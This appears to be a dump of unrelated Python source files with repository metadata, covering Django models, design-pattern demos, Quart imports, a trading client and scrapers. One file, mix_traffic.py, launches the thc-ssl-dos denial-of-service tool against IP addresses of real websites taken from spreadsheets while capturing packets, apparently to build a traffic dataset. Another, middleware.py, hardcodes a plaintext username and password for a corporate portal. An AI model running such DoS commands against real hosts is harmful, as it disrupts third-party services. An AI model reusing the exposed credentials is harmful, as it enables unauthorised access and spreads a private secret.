log(calc(log, values, 1))
if __name__ == "__main__":
import sys, os
def find_input_file():
for fn in sys.argv[1:] + ["input.txt", f"day_{DAY_NUM:0d}_input.txt", f"day_{DAY_NUM:02d}_input.txt"]:
for dn in [[], ["Puzzles"], ["..", "Puzzles"]]:
cur = os.path.join(*(dn + [fn]))
if os.path.isfile(cur): return cur
fn = find_input_file()
if fn is None: print("Unable to find input file!\nSpecify filename on command line"); exit(1)
print(f"Using '{fn}' as input file:")
with open(fn) as f: values = [x.strip("\r\n") for x in f.readlines()]
print(f"Running day {DAY_DESC}:")
run(print, values)
| [
"[email protected]"
] | |
7d694881d590f7fe45d3be9f6d9c0c180d407993 | 0049d7959ff872e2ddf6ea3ce83b6c26512425a6 | /django_demo_applications/djangoprojectsot/modelinheritanceproject/testapp/models.py | 2ba2ba663d87e53e60132476cad2e672ab93660a | [] | no_license | srazor09/Django_projects | 9806ab25d966af780cdabe652a1792220c7806a8 | 8d664ba4c9478bd93c8e5bcbcaf594e8ffe6ce93 | refs/heads/master | 2023-04-18T02:13:15.993393 | 2021-05-04T20:34:05 | 2021-05-04T20:34:05 | 364,379,605 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 695 | py | from django.db import models
# Create your models here.
# class ContactInfo1(models.Model):
# name=models.CharField(max_length=64)
# email=models.EmailField()
# address=models.CharField(max_length=264)
#
# class Student1(ContactInfo1):
# rollno=models.IntegerField()
# marks=models.IntegerField()
#
# class Teacher1(ContactInfo1):
# subject=models.CharField(max_length=264)
# salary=models.FloatField()
class BasicModel(models.Model):
f1=models.CharField(max_length=64)
f2=models.CharField(max_length=64)
f3=models.CharField(max_length=64)
class StandardModel(BasicModel):
f4=models.CharField(max_length=64)
f5=models.CharField(max_length=64)
| [
"[email protected]"
] | |
2a8d31ce9ce3683a0d4c071feaf1b1488a845422 | 48dab42eeef7f971af1fe98045e669edb8e57ab0 | /behavioural/observer_pattern.py | 864f36310cf2de51d7e96f2ba31734a1eb35c03e | [
"MIT"
] | permissive | cosmos-sajal/python_design_patterns | b7df3e83e74ac5eccd30e8037ebc70987407ca2b | d270989f1dfafaef48e4b585eca91603a6c0ac8e | refs/heads/master | 2022-06-06T16:41:41.638518 | 2020-05-05T08:20:16 | 2020-05-05T08:20:16 | 260,250,022 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,112 | py | # Docs - https://deductionlearning.com/design-patterns/observer-pattern-introductory-example/
# https://www.youtube.com/watch?v=wiQdrH2YpT4&list=PLF206E906175C7E07&index=4
# https://www.quora.com/What-are-some-real-world-uses-of-observer-pattern
# difference between PubSub and Observer Pattern -
# https://hackernoon.com/observer-vs-pub-sub-pattern-50d3b27f838c
from abc import ABCMeta, abstractmethod
class Subject(metaclass=ABCMeta):
@abstractmethod
def register(self):
pass
@abstractmethod
def unRegister(self):
pass
@abstractmethod
def notify(self):
pass
class Observer(metaclass=ABCMeta):
@abstractmethod
def update(googlePrice, applePrice, ibmPrice):
pass
class StockObserver(Observer):
observerCounter = 0
def __init__(self, stockGrabber):
StockObserver.observerCounter += 1
self.observerId = StockObserver.observerCounter
stockGrabber.register(self)
def update(self, googlePrice, applePrice, ibmPrice):
print("observer id -" + str(self.observerId))
print("the prices are:" + str(googlePrice) +
" " + str(applePrice) + " " + str(ibmPrice))
class StockGrabber(Subject):
def __init__(self):
self.googlePrice = 0.0
self.applePrice = 0.0
self.ibmPrice = 0.0
self.observers = []
def register(self, o):
self.observers.append(o)
def unRegister(self, o):
self.observers.remove(o)
def notify(self):
for observer in self.observers:
observer.update(self.googlePrice, self.applePrice, self.ibmPrice)
def setGooglePrice(self, price):
self.googlePrice = price
self.notify()
def setApplePrice(self, price):
self.applePrice = price
self.notify()
def setIBMPrice(self, price):
self.ibmPrice = price
self.notify()
stockGrabber = StockGrabber()
observer1 = StockObserver(stockGrabber)
observer2 = StockObserver(stockGrabber)
stockGrabber.setGooglePrice(100.0)
stockGrabber.setApplePrice(200.0)
stockGrabber.setIBMPrice(300.0)
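# Expected output (derived from update() above): every price change notifies
# both registered observers, e.g. after setGooglePrice(100.0):
#   observer id -1
#   the prices are:100.0 0.0 0.0
#   observer id -2
#   the prices are:100.0 0.0 0.0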
| [
"[email protected]"
] | |
1e5122dc89c65f5bcead30da6a84115a1b6723ee | 94f978c65b6368f936e18364cc477591094750f5 | /quart/__init__.py | c7fa2b897ed9969c7681fd2a6aa8a28fd1fd4750 | [
"MIT"
] | permissive | tharvik/quart | 2a4ff330dd384dc9f917b179e8d247808e7ccd6c | 038680bcc1c0966481d73bdbe474f55a3ce104f4 | refs/heads/master | 2021-04-18T21:54:18.339532 | 2018-03-06T08:06:33 | 2018-03-06T08:11:48 | 126,790,492 | 0 | 0 | null | 2018-03-26T07:29:58 | 2018-03-26T07:29:58 | null | UTF-8 | Python | false | false | 2,082 | py | from jinja2 import escape, Markup
from .__about__ import __version__
from .app import Quart
from .blueprints import Blueprint
from .config import Config
from .ctx import (
after_this_request, copy_current_request_context, copy_current_websocket_context,
has_app_context, has_request_context, has_websocket_context,
)
from .exceptions import abort
from .globals import (
_app_ctx_stack, _request_ctx_stack, _websocket_ctx_stack, current_app, g, request, session,
websocket,
)
from .helpers import (
flash, get_flashed_messages, get_template_attribute, make_response, stream_with_context,
url_for,
)
from .json import htmlsafe_dumps, jsonify
from .signals import (
appcontext_popped, appcontext_pushed, appcontext_tearing_down, before_render_template,
got_request_exception, message_flashed, request_finished, request_started,
request_tearing_down, signals_available, template_rendered,
)
from .static import safe_join, send_file, send_from_directory
from .templating import render_template, render_template_string
from .typing import ResponseReturnValue
from .utils import redirect
from .wrappers import Request, Response
__all__ = (
'__version__', '_app_ctx_stack', '_request_ctx_stack', '_websocket_ctx_stack', 'abort',
'after_this_request', 'appcontext_popped', 'appcontext_pushed', 'appcontext_tearing_down',
'before_render_template', 'Blueprint', 'Config', 'copy_current_request_context',
'copy_current_websocket_context', 'current_app', 'escape', 'flash', 'g',
'get_flashed_messages', 'get_template_attribute', 'got_request_exception', 'has_app_context',
'has_request_context', 'has_websocket_context', 'htmlsafe_dumps', 'jsonify', 'make_response',
'Markup', 'message_flashed', 'Quart', 'redirect', 'render_template', 'render_template_string',
'request', 'Request', 'request_finished', 'request_started', 'request_tearing_down',
'Response', 'ResponseReturnValue', 'safe_join', 'send_file', 'send_from_directory', 'session',
'signals_available', 'stream_with_context', 'template_rendered', 'url_for', 'websocket',
)
| [
"[email protected]"
] | |
8463f1d6308fa2292d9dfa2ea550c1529e9d3cd5 | 1c3c155f39573ca9b382bc2520dde359cc6f8fe6 | /mix_traffic.py | 0480d3f061e9e726c1ed9516f74c19b851135496 | [] | no_license | zxyap/mix_traffic_collection | 885a60a3f30783d05124e26eb7ddc97fc6ecbf5d | 14f34dec56226ca2ed1ac6c29cb5f155cb9420e1 | refs/heads/master | 2022-12-11T10:02:19.215427 | 2019-10-03T13:35:04 | 2019-10-03T13:35:04 | 211,783,201 | 0 | 0 | null | 2022-12-08T06:39:30 | 2019-09-30T05:38:15 | Python | UTF-8 | Python | false | false | 14,711 | py | import os
from selenium import webdriver
import subprocess
import datetime
import logging
import socket
import random
from fake_useragent import UserAgent
import time
from urllib.request import Request, urlopen
import urllib.error
import argparse
from bs4 import BeautifulSoup
import sys
from selenium.common.exceptions import InvalidArgumentException
import pandas as pd
import numpy as np
from selenium.common.exceptions import TimeoutException
from selenium.common.exceptions import InvalidSessionIdException
from selenium.common.exceptions import UnexpectedAlertPresentException
from selenium.common.exceptions import SessionNotCreatedException
from selenium.common.exceptions import WebDriverException
import http.client
import ssl
import psutil
import requests
from requests import HTTPError
from requests import Timeout
from requests import RequestException
import threading
#global variable
isAttacking = 1
isNormal = 0
excel_dir = "./report_unique_normal.xlsx"
excel_dir_dos = "./report_unique_dos.xlsx"
print("Reading from excel file now for the list of sites to test...")
df = pd.read_excel(excel_dir, sheet_name="complete_list")
df_dos = pd.read_excel(excel_dir_dos, sheet_name="thc-tls-dos")
dictionary = {}
dictionary_dos = {}
ip_list_normal = df['IP']
ip_list_dos = df_dos['IP']
ua = UserAgent()
length = 0
def clean_domain(url):
if "https://" in url:
result = url[8:]
elif "http://" in url:
result = url[7:]
else:
result = url
if "/" in result:
result = result.split("/")[0]
return result
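# e.g. clean_domain("https://example.com/path/page") returns "example.com"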
def normal(ip):
# Finding the chromedriver path to start selenium web driver
# Getting the abs path of chromedriver for selenium automation
cdPath = "chromedriver"
chromeDriverPath = os.path.abspath(cdPath)
while isAttacking == 1:
options = webdriver.ChromeOptions()
options.add_argument('--ignore-certificate-errors')
options.add_argument('--ignore-certificate-errors-spki-list')
options.add_argument('--ignore-ssl-errors')
options.add_argument('--no-sandbox')
options.add_argument('--headless')
options.add_argument('--disable-dev-shm-usage')
try:
driver = webdriver.Chrome(chromeDriverPath, options=options)
except SessionNotCreatedException as snce:
logging.exception(str(snce) + " session failed to create")
pass
# Setting a timeout for the page load to hasten the process
driver.set_page_load_timeout(time_to_wait=30)
# Getting domain
domain = dictionary[ip]
print("testing " + domain)
# Check if website has http
if domain[0:7] != "http://":
# appending https:// for urllib
domain_urllib = "https://" + domain
else:
domain_urllib = domain
print(domain_urllib)
headers = {'User-Agent': ua.random}
req = Request(
domain_urllib,
headers={'User-Agent': ua.random}
)
# Trying to open the URL to scrape HTML
try:
resp = urlopen(req).read()
except urllib.error.HTTPError as httpe:
logging.error(str(httpe) + " for " + domain_urllib)
continue
except urllib.error.URLError as urle:
logging.error(str(urle) + " for " + domain_urllib)
continue
except TimeoutError as toe:
logging.error(str(toe) + " for " + domain_urllib)
continue
except http.client.HTTPException as httpexcep:
logging.error(str(httpexcep) + " for " + domain_urllib)
continue
except ssl.CertificateError as sslCE:
logging.error(str(sslCE) + " for " + domain_urllib)
continue
except ConnectionResetError as cre:
logging.error(str(cre) + " for " + domain_urllib)
continue
except UnicodeEncodeError as uee:
logging.error(str(uee) + " for " + domain_urllib)
continue
except ValueError as ve:
logging.error(str(ve) + " for " + domain_urllib)
continue
soup = BeautifulSoup(resp, "html.parser")
cleanLinks = []
    for link in soup.find_all('a', href=True):
        href = link["href"]
        if "javascript" not in href and "#" not in href:
            cleanLinks.append(href)
try:
driver.get(domain_urllib)
except TimeoutException as toe:
print("Timeout, moving onto next site")
logging.exception(str(toe) + " for " + domain_urllib)
pass
except InvalidSessionIdException as isie:
print("Invalid session id, moving on to the next site")
logging.exception(str(isie) + " for " + domain_urllib)
pass
    # This polls for the return code of the tshark process; once the capture finishes (e.g. a packet-count limit is reached), the expected return code is 0
count = 0
timeout = 50
#set flag = 1 once the normal traffic has started
global isNormal
isNormal = 1
    while isAttacking == 1:
count = 1 #make counter a non factor
return_code = sts.poll()
if return_code == 0 or count >= timeout:
if return_code == 0:
print("tshark has terminated gracefully")
logging.info("tshark has terminated gracefully")
elif count >= timeout:
print("timeout has been reached")
logging.info("timeout has been reached")
for proc in psutil.process_iter():
# check whether the process name matches
if proc.pid == sts.pid:
try:
proc.kill()
except psutil.NoSuchProcess as nsp:
logging.error(str(nsp))
finally:
break
else:
continue
break
else:
if len(cleanLinks) > 1:
link = random.choice(cleanLinks)
ip_socket = []
if "http" not in link and ".com" not in link:
seleniumLink = "https://" + domain + link
socketLink = domain
else:
seleniumLink = link
socketLink = clean_domain(link)
try:
socket_info = socket.getaddrinfo(socketLink, None)
except socket.gaierror as e:
logging.error(str(e) + " error for " + str(socketLink))
continue
except UnicodeError as e:
logging.error(str(e) + " error for " + str(socketLink))
continue
for info in socket_info:
ip_socket.append(info[4][0])
for ip_test in ip_socket:
# Introducing sleep between 3 to 8 seconds to allow simulation of user behaviour
#time.sleep(np.random.randint(low=3, high=8))
if ip_test == ip:
try:
driver.get(seleniumLink)
logging.info("Successfully accessed website " + str(seleniumLink))
except InvalidArgumentException as iae:
logging.info(str(iae) + "Invalid Argument Exception " + str(seleniumLink))
continue
except TimeoutException as te:
logging.info(str(te) + "Time Out Exception " + str(seleniumLink))
continue
except UnexpectedAlertPresentException as uape:
logging.exception(str(uape) + " unexpected alert present!")
driver.switch_to.alert.accept()
continue
except WebDriverException as wde:
logging.exception(str(wde) + " webdriver exception!")
continue
finally:
break
else:
print("Sending GET requests!")
logging.info("Sending GET requests to " + ip + " " + domain)
try:
requests.get("http://" + ip, headers={'User-Agent': ua.random}, timeout=5)
except ConnectionError as ce:
logging.error(str(ce))
except HTTPError as httperr:
logging.error(str(httperr))
except Timeout as toe:
logging.error(str(toe))
except RequestException as re:
logging.exception(str(re))
finally:
break
else:
pass
count = 0
# Kill chrome processes to clear memory to avoid virtual memory problem
parent = psutil.Process(driver.service.process.pid)
chromeProcesses = (parent.children(recursive=True))
if chromeProcesses != "":
for process in chromeProcesses:
p = psutil.Process(process.pid)
p.kill()
try:
driver.quit()
except TimeoutException as toe:
logging.exception(str(toe) + " Driver failed to close")
except UnexpectedAlertPresentException as uape:
logging.exception(str(uape) + " unexpected alert present!")
driver.switch_to.alert.accept()
driver.close()
finally:
driver.quit()
# Terminate selenium
try:
driver.quit()
except NameError as NE:
logging.error(str(NE))
driver.close()
def attack(ip):
count = 0
    while isNormal == 0:
        time.sleep(1)
        count = count + 1
        if count == 60:
            global isAttacking
            isAttacking = 0
            return
print('ready to attack at ' + str(ip))
# Initializer for thc-ssl-dos
# Declaring variables for thc-ssl-dos
parallel_connections = 1
port = 443
logging.info("DDOSING at " + ip)
thc_command = "thc-ssl-dos -l " + str(parallel_connections) + " " + ip + " " + str(port) + " " + "--accept"
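    # With the defaults above this builds e.g. "thc-ssl-dos -l 1 <ip> 443 --accept"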
GNULL = open(os.devnull, 'w')
thc_process = subprocess.Popen(thc_command, shell=True, stdout=GNULL)
logging.info("Opened DOS attack at " + ip)
# Sleeping for 25 seconds before killing them off
time.sleep(60)
kill_thc = "killall -s SIGTERM thc-ssl-dos"
kill_sniff = "killall -s SIGTERM tshark"
os.system(kill_thc)
os.system(kill_sniff)
    isAttacking = 0
print('THE ATTACK HAS STOPPED. Exiting the attack thread..')
logging.info("DDOS finished for " + ip)
if __name__ == '__main__' :
# Initializing the dictionary to be able to retrieve the names easily
# Different IP (Key) lead to same Domain (Value)
for index, row in df.iterrows():
domain = row['Domain']
ip = row['IP']
dictionary[ip] = domain
for index, row in df_dos.iterrows():
domain = row['Domain']
ip = row['IP']
dictionary_dos[ip] = domain
if(len(dictionary) < len(dictionary_dos)):
length = len(dictionary)
else:
length = len(dictionary_dos)
logging.basicConfig(filename='mixed_traffic.log', level=logging.INFO, format='%(asctime)s-%(levelname)s-%(message)s')
location = "/media/sf_Shared2/mixed/"
#location = "output/"
file_path = os.path.join(location + "mixed_traffic/" + datetime.datetime.now().strftime("%Y-%m-%d_%H-%M-%S"))
if not os.path.exists(file_path):
os.makedirs(file_path)
####################for single testing########################################
#ip_normal = ip_list_normal[0]
#ip_dos = ip_list_dos[0]
#isAttacking = 1
#isNormal = 0
# SNIFFER
# Declaring variables for the sniffer
# Capture filter ip_list[0] is taken as the first IP resolved to capture
# Might not be too perfect in the case
#abspath = os.path.abspath(file_path)
#interface = "eth0"
#capture_filter = "tcp port 443 and host " + ip_normal + " or " + ip_dos
#filename = abspath + "/" + ip_normal + "_" + ip_dos + "_" + datetime.datetime.now().strftime("%Y-%m-%d_%H-%M-%S") + ".pcap"
# Raw capturing
#command = ["tshark", "-i", interface, "-c", "5000", "-f", capture_filter, "-w", filename]
#command = ["tshark", "-i", interface, "-f", capture_filter, "-w", filename]
#sts = subprocess.Popen(command, shell=False)
#time.sleep(5)
#normal_t = threading.Thread(target=normal, args=(ip_normal,))
#normal_t.start()
#attack_t = threading.Thread(target=attack, args=(ip_dos,))
#attack_t.start()
##############################################################################
for i in range(814, length):
ip_dos = ip_list_dos[i]
ip_normal = ip_list_normal[i]
print("normal at " + ip_normal)
print("ddos at " + ip_dos)
isAttacking = 1
isNormal = 0
# SNIFFER
# Declaring variables for the sniffer
# Capture filter ip_list[0] is taken as the first IP resolved to capture
# Might not be too perfect in the case
abspath = os.path.abspath(file_path)
interface = "eth0"
capture_filter = "tcp port 443 and host " + ip_normal + " or " + ip_dos
filename = abspath + "/" + ip_normal + "_" + ip_dos + "_" + datetime.datetime.now().strftime("%Y-%m-%d_%H-%M-%S") + ".pcap"
# Raw capturing
#command = ["tshark", "-i", interface, "-c", "5000", "-f", capture_filter, "-w", filename]
command = ["tshark", "-i", interface, "-f", capture_filter, "-w", filename]
sts = subprocess.Popen(command, shell=False)
time.sleep(5)
normal_t = threading.Thread(target=normal, args=(ip_normal,))
normal_t.start()
attack_t = threading.Thread(target=attack, args=(ip_dos,))
attack_t.start()
        while isAttacking == 1:
time.sleep(2)
print('attack has stopped..')
normal_t.join()
attack_t.join()
| [
"[email protected]"
] | |
9c49f34c4e0af8d51ca97a03a373e5fc2d76440a | f0a5ad7b8aa39f51f233391fead0da3eabecc4ee | /.history/toolbox/middleware_20191129081531.py | bed0186b917d604de34c93cc7df6e8c7ddb4bfb8 | [] | no_license | OseiasBeu/webScrapping | e0a524847e55b24dbbd3d57bbe7fa43b4e101f48 | 1e72c7551aea355a891043baecfcbab8a89e719a | refs/heads/master | 2022-10-25T18:12:50.858653 | 2020-06-18T01:29:24 | 2020-06-18T01:29:24 | 224,681,550 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,601 | py | # -*- coding: utf-8 -*-
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.keys import Keys
from datetime import datetime
import toolbox.sheets as sheet
import pandas as pd
def middleware():
driver = webdriver.Chrome(executable_path='chromedriver.exe')
driver.get("https://wsmid-prd.whirlpool.com.br/manager/reports/frmQueryAnalyzer.aspx?menu=2")
dominio = 'whirlpool'
usuario = 'daniel_coelho'
senha = 'Sua95xb4'
bra = "BRA"
data = '2019-11-01'
query = "SELECT pedido.clienteEstado, pedidoItem.warehouseId, count(pedidoItem.warehouseId) as [Pendentes de integração] FROM pedido LEFT JOIN pedidoItem ON pedido.codigoPedido = pedidoItem.codigoPedido WHERE pedido.datahoracriacao > '{}' AND pedido.clientepais = '{}' AND pedido.flagIntegrado = 0 GROUP BY pedidoItem.warehouseId, pedido.clienteEstado ORDER BY [Pendentes de integração] DESC".format(data,bra)
campo_dominio = driver.find_element_by_id("ucLogin1_txtDominio")
campo_dominio.send_keys(dominio)
    campo_usuario = driver.find_element_by_id("ucLogin1_txtUser")
campo_usuario.send_keys(usuario)
campo_senha = driver.find_element_by_id("ucLogin1_txtPass")
campo_senha.send_keys(senha)
campo_senha.send_keys(Keys.RETURN)
records = driver.find_element_by_id("ctl00_ContentPlaceHolder1_dropRows")
records.send_keys('sem limites')
text_query = driver.find_element_by_id("ctl00_ContentPlaceHolder1_txtQuery")
text_query.send_keys(query)
executar = driver.find_element_by_id("ctl00_ContentPlaceHolder1_imbExecutar").click()
arr = []
resposta = driver.find_elements_by_tag_name('tr')
for item in range(len(resposta)):
linha = resposta[item].text
arr.append(linha.split())
coluna = arr[3]
coluna1 = coluna.pop(3)
    coluna1 = coluna1 + " " + coluna.pop(3)
    coluna1 = coluna1 + " " + coluna.pop(3)
coluna.append(coluna1)
df = pd.DataFrame(data=arr[4:], columns=coluna)
# df = df.insert(0,'timeStamp')
now = datetime.now()
df['timeStamp'] = ''
df1 = df.drop(columns='#')
wb = pd.ExcelFile('base_middleware.xlsx')
base_m = pd.read_excel(wb)
print(base_m.head())
print(df1.head())
sheet.insertPlanMiddleware(df1)
    base_m['timeStamp'] = datetime.now().strftime('%m/%d/%Y %H:%M:%S')
print(df1)
    df1 = df1.append(base_m)
print(base_m)
nomeArquivo = 'base_middleware.xlsx'
df1.to_excel(nomeArquivo, index=False)
sair = driver.find_element_by_id("ctl00_lgStatus").click()
driver.close()
# clienteEstado warehouseId Pendentes de integração Última hora? | [
"[email protected]"
] | |
43d3606680c7c08b541d8e66a106bbe7f13c0fa7 | 2923b9f58e6a143a3e070169612165585c301def | /LA/gp_rupture_test/LA/gp_rupture_test/gp_021219_Scott_7.35_noplas_2hz/fault_full_loc.py | d3f385c3d1a7f68a7593b81008a1ecdc93ae3228 | [] | no_license | hzfmer/summit_work_021421 | 16536dd716519bc9244da60007b9061ef5403429 | 6981b359fefb2af22e0bea6c47511de16cad22bd | refs/heads/master | 2023-03-11T15:34:36.418971 | 2021-02-05T23:22:10 | 2021-02-05T23:22:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,451 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Created on Wed Oct 17 2018
@author: Zhifeng Hu <[email protected]>
"""
import numpy as np
from numpy import sin, cos, pi, sqrt
import os
import sys
import glob
import time
from scipy.interpolate import interp1d
nt_ref = 2000
nt_des = 10 * nt_ref
theta_rot = 35
f = open(glob.glob('./*.srf')[0],'r')
f.readline()
f.readline()
token = f.readline()
nx = int(token.split()[2])
nz = int(token.split()[3])
f.close()
if not os.path.isfile('fault_full_loc.txt'):
fault_loc = np.array(np.loadtxt("fault_loc.idx"))
x1 = int(fault_loc[0,0])
x2 = int(fault_loc[1,0])
y1 = int(fault_loc[0,1])
y2 = int(fault_loc[1,1])
x_tmp = np.linspace(x1, x2, np.abs(x2 - x1) + 1)
y_tmp = [np.float((y2-y1)/(x2-x1))*(x-x1) + y1 for x in x_tmp]
    f_interp = interp1d(x_tmp, y_tmp, fill_value='extrapolate')
if x1 < x2:
new_x = np.arange(x1, x1 + nx * 2 )
new_y = [np.int(i) for i in f_interp(new_x)]
else:
new_x = np.arange(x1 + 1 - nx * 2, x1 + 1)
new_y = [np.int(i) for i in f_interp(new_x)]
new_x = new_x[::-1]
new_y = new_y[::-1]
mx = 6320
my = 4200
ll = np.fromfile('../scripts/surf.grid', dtype='float64', count=2 * my * mx).reshape(my, mx, 2)
ll_fault = [np.float32((ll[new_y[i], new_x[i], 0], ll[new_y[i], new_x[i], 1])) for i in range(len(new_x))]
    np.savetxt('fault_full_loc.txt', ll_fault, fmt='%f')
# np.array(ll_fault).tofile('latlon_fault.bin')
| [
"[email protected]"
] | |
3a2aace405551240c749077517533bdee9b234de | e562f7e0a51273475e50a7e61d1d377f88775622 | /flags.py | 39c29607dfbc5649d50a4d7b0c0d48d7e2e0df9b | [] | no_license | bloodcurdle/ReadableWebProxy | d1c6ae0220fdb04ea7ab82963c86e776a0dbbfd9 | 10f68f913a78f8b0e47582996d9860a61da55dd6 | refs/heads/master | 2021-05-29T19:58:32.965610 | 2015-11-09T18:25:00 | 2015-11-09T18:25:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 122 | py |
RUNSTATE = True
FEEDER_STARTED = False
RSS_DEBUG = False
RULE_CACHE = None
SPECIAL_CASE_CACHE = None | [
"[email protected]"
] | |
c553f3cf8e814068e3de80a5d5d74670c9a32497 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_212/62.py | 2e921c86f22c4e6edb1a0681c1da5040d943a43a | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 793 | py | import sys
import itertools
sys.setrecursionlimit(10000000)
tc = int(sys.stdin.readline().strip())
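# For each case: cnts[r] counts the groups whose size is congruent to r mod P.
# dp(cfg, p) below returns the minimum number of groups that must start while a
# nonzero leftover p remains, so len(gs) - dp(cnts, 0) is the maximum number of
# groups that can start with no leftover.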
for tmp_tc in xrange(tc):
[ N, P ] = map(lambda x: int(x), sys.stdin.readline().strip().split(' '))
gs = map(lambda x: int(x), sys.stdin.readline().strip().split(' '))
cnts = [ 0 ] * P
for g in gs:
cnts[g % P] += 1
cache = {}
def dp(cfg, p):
if sum(cfg) == 0: return 0
key = tuple(cfg), p
if key in cache: return cache[key]
res = None
for idx, k in enumerate(cfg):
if k == 0: continue
cfg[idx] -= 1
pp = (p + idx) % P
tmp = dp(cfg, pp)
if p: tmp += 1
if res is None or res > tmp: res = tmp
cfg[idx] += 1
cache[key] = res
return res
res = len(gs) - dp(cnts, 0)
print "Case #%d: %d" % (1+tmp_tc, res)
| [
"[email protected]"
] | |
73be991d92aa7d1f221c705467c3b65a83ab1b85 | c8faa6a4343a1b3775eb0cd707271f6c4aede6be | /quant/platform/deribit.py | 3d076c1c19b2afd753315af68b2af69209a0dfa9 | [
"MIT"
] | permissive | 51bitquant/thenextquant | adada6c2b88723971413f12df23505bd250c86d0 | b0b9d60439a916bc4b1980f908f648aa863d5918 | refs/heads/master | 2023-05-29T21:23:18.198952 | 2023-05-14T08:42:56 | 2023-05-14T08:42:56 | 640,403,755 | 6 | 2 | null | 2023-05-14T01:06:46 | 2023-05-14T01:06:45 | null | UTF-8 | Python | false | false | 13,662 | py | # -*- coding:utf-8 -*-
"""
Deribit Trade module 交易模块
https://docs.deribit.com/v2/
Author: HuangTao
Date: 2019/04/20
"""
import json
import copy
import asyncio
from quant.utils import logger
from quant.const import DERIBIT
from quant.position import Position
from quant.utils.websocket import Websocket
from quant.tasks import LoopRunTask, SingleTask
from quant.utils.decorator import async_method_locker
from quant.order import Order
from quant.order import ORDER_ACTION_BUY, ORDER_ACTION_SELL
from quant.order import ORDER_TYPE_LIMIT, ORDER_TYPE_MARKET
from quant.order import ORDER_STATUS_SUBMITTED, ORDER_STATUS_PARTIAL_FILLED, ORDER_STATUS_FILLED, \
ORDER_STATUS_CANCELED, ORDER_STATUS_FAILED
from quant.order import TRADE_TYPE_BUY_OPEN, TRADE_TYPE_SELL_OPEN, TRADE_TYPE_SELL_CLOSE, TRADE_TYPE_BUY_CLOSE
class DeribitTrade(Websocket):
""" Deribit Trade module 交易模块
"""
def __init__(self, account, strategy, symbol, host=None, wss=None, access_key=None, secret_key=None,
order_update_callback=None, position_update_callback=None):
""" 初始化
@param account 账户
@param strategy 策略名称
@param symbol 交易对(合约名称)
@param host HTTP请求主机地址
@param wss websocket连接地址
@param access_key ACCESS KEY
@param secret_key SECRET KEY
@param order_update_callback 订单更新回调
@param position_update_callback 持仓更新回调
"""
self._account = account
self._strategy = strategy
self._platform = DERIBIT
self._symbol = symbol
self._host = host if host else "https://www.deribit.com"
self._wss = wss if wss else "wss://deribit.com/ws/api/v2"
self._access_key = access_key
self._secret_key = secret_key
self._order_update_callback = order_update_callback
self._position_update_callback = position_update_callback
        self._order_channel = "user.orders.{symbol}.raw".format(symbol=symbol)  # order subscription channel
super(DeribitTrade, self).__init__(self._wss, send_hb_interval=5)
        self._orders = {}  # orders
        self._position = Position(self._platform, self._account, strategy, symbol)  # position
        self._query_id = 0  # message sequence id, used to uniquely identify each request
        self._queries = {}  # pending requests {"request_id": future}
self.initialize()
        # register periodic tasks
        LoopRunTask.register(self._do_auth, 60 * 60)  # re-authenticate every hour
        LoopRunTask.register(self._check_position_update, 1)  # fetch position periodically
        self._ok = False  # whether an authenticated websocket connection has been established
@property
def position(self):
return copy.copy(self._position)
@property
def orders(self):
return copy.copy(self._orders)
async def connected_callback(self):
""" 建立连接之后,授权登陆,然后订阅order和position
"""
        # authenticate
success, error = await self._do_auth()
if error:
return
if success.get("access_token"):
self._ok = True
else:
return
        # fetch open (not fully filled) orders
success, error = await self.get_open_orders()
if error:
return
for order_info in success:
order = self._update_order(order_info)
if self._order_update_callback:
SingleTask.run(self._order_update_callback, order)
        # fetch position
        await self._check_position_update()
        # after successful authentication, subscribe to data
method = "private/subscribe"
params = {
"channels": [
self._order_channel
]
}
await self._send_message(method, params)
async def _do_auth(self, *args, **kwargs):
""" 鉴权
"""
method = "public/auth"
params = {
"grant_type": "client_credentials",
"client_id": self._access_key,
"client_secret": self._secret_key
}
success, error = await self._send_message(method, params)
return success, error
async def get_server_time(self):
""" 获取服务器时间
"""
method = "public/get_time"
params = {}
success, error = await self._send_message(method, params)
return success, error
async def get_position(self):
""" 获取当前持仓
"""
method = "private/get_position"
params = {"instrument_name": self._symbol}
success, error = await self._send_message(method, params)
return success, error
async def create_order(self, action, price, quantity, order_type=ORDER_TYPE_LIMIT):
""" 创建订单
@param action 委托方向 BUY SELL
@param price 委托价格
@param quantity 委托数量
@param order_type 委托类型 limit/market
"""
if int(quantity) > 0:
if action == ORDER_ACTION_BUY:
trade_type = TRADE_TYPE_BUY_OPEN
else:
trade_type = TRADE_TYPE_SELL_CLOSE
else:
if action == ORDER_ACTION_BUY:
trade_type = TRADE_TYPE_BUY_CLOSE
else:
trade_type = TRADE_TYPE_SELL_OPEN
quantity = abs(int(quantity))
if action == ORDER_ACTION_BUY:
method = "private/buy"
elif action == ORDER_ACTION_SELL:
method = "private/sell"
else:
logger.error("action error! action:", action, caller=self)
            return None, "action error"
if order_type == ORDER_TYPE_LIMIT:
type_ = "limit"
else:
type_ = "market"
params = {
"instrument_name": self._symbol,
"price": price,
"amount": quantity,
"type": type_,
"label": str(trade_type)
}
success, error = await self._send_message(method, params)
if error:
return None, error
order_no = success["order"]["order_id"]
return order_no, None
async def revoke_order(self, *order_nos):
""" 撤销订单
@param order_nos 订单号,如果没有指定订单号,那么撤销所有订单
* NOTE: 单次调换最多只能撤销100个订单,如果订单超过100个,请多次调用
"""
        # if order_nos is empty, cancel all orders
if len(order_nos) == 0:
method = "private/cancel_all_by_instrument"
params = {"instrument_name": self._symbol}
success, error = await self._send_message(method, params)
if error:
return False, error
else:
return True, None
        # if a single order id is given, cancel only that order
if len(order_nos) == 1:
method = "private/cancel"
params = {"order_id": order_nos[0]}
success, error = await self._send_message(method, params)
if error:
return order_nos[0], error
else:
return order_nos[0], None
        # if more than one order id is given, cancel them one by one
if len(order_nos) > 1:
success, error = [], []
method = "private/cancel"
